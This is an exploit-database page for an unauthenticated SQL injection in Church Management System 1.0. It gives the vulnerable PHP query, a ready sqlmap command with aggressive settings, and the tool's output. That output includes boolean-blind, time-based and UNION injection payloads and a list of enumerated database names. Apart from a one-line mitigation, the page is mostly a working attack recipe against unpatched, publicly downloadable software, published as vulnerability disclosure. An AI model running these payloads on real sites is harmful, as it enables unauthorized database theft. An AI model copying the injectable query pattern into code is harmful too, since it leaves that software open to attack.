Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)

vendor:

Church Management System

by:

Erwin Krazek (Nero)

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Church Management System

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:oretnom23:church_management:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Apache, Mysql

2021

Church Management System 1.0 – ‘search’ SQL Injection (Unauthenticated)

Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.

Mitigation:

Input validation and sanitization should be implemented to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)
# Exploit Author: Erwin Krazek (Nero)
# Date: 17/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Vendor: oretnom23
# Version: v1.0
# Tested on: Linux, Apache, Mysql
# Exploit Description:
Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.

# Vulnerable Code
In search.php on line 28
$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;

Sqlmap command:
sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch

Output:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -
---
[17:33:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.46, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[17:33:38] [INFO] fetching database names
available databases [4]:
[*] church_db
[*] information_schema
[*] mysql
[*] performance_schema